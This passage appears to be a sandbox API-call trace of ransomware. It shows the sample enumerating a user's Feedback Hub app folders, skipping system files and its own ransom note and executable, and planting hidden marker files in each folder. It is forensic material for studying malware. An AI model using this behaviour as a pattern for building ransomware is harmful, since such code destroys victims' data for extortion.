RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124810 [0063.522] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122188 [0063.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed66dee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed66dee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbed66dee, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0063.522] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0063.522] lstrcpyW (in: lpString1=0x130ebdc, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0063.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0063.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122fc0 [0063.522] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x122288 [0063.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5d1c9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a51d81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbed5d1c9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0063.522] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0063.523] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0063.523] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0063.523] lstrcpyW (in: lpString1=0x130ebdc, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0063.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0063.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11e2c0 [0063.523] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x1221e8 [0063.523] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed55c81, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52772, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbed55c81, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0063.523] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0063.523] lstrcpyW (in: lpString1=0x130ebdc, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0063.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0063.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11e388 [0063.523] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1222a8 [0063.523] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed58391, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52e58, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbed58391, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0063.523] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0063.524] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0063.524] lstrcpyW (in: lpString1=0x130ebdc, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0063.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0063.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123760 [0063.524] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x1222c8 [0063.524] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5fe7b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed646ee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbed69507, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0063.524] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0063.524] lstrcpyW (in: lpString1=0x130ebdc, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0063.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0063.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123500 [0063.524] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122228 [0063.524] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed6335f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed6335f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbed6335f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0063.524] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.524] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.524] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0063.525] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0063.525] lstrcpyW (in: lpString1=0x130ebdc, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0063.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0063.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x123828 [0063.525] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x121f88 [0063.525] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5aaa6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a53e18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbed5aaa6, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0063.525] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0063.525] lstrcpyW (in: lpString1=0x130ebdc, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0063.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0063.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122900 [0063.525] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122008 [0063.525] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5aaa6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a53e18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbed5aaa6, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0063.525] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.525] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.526] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.526] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.526] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.526] CloseHandle (hObject=0x278) returned 1 [0063.526] CloseHandle (hObject=0x298) returned 1 [0063.527] GetCurrentThreadId () returned 0xd98 [0063.527] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0063.527] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState" [0063.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122900 | out: hHeap=0xe0000) returned 1 [0063.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0063.527] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState" [0063.527] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\" [0063.527] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0063.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.530] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.533] FlushFileBuffers (hFile=0x298) returned 1 [0063.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.534] CloseHandle (hObject=0x298) returned 1 [0063.535] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState") returned 91 [0063.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.535] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5aaa6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a53e18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0063.535] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.535] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.535] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.535] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.535] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5aaa6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a53e18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.535] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.535] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.535] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.535] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.535] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.535] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef30c52a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef30c52a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.535] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.535] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.535] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef30c52a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef30c52a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef30c52a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.535] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0063.535] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.535] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.536] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.536] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.537] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.537] CloseHandle (hObject=0x278) returned 1 [0063.537] CloseHandle (hObject=0x298) returned 1 [0063.537] GetCurrentThreadId () returned 0xd98 [0063.537] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0063.537] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData" [0063.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0063.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0063.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData" [0063.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\" [0063.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0063.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.539] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.541] FlushFileBuffers (hFile=0x298) returned 1 [0063.542] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.542] CloseHandle (hObject=0x298) returned 1 [0063.543] lstrlenW 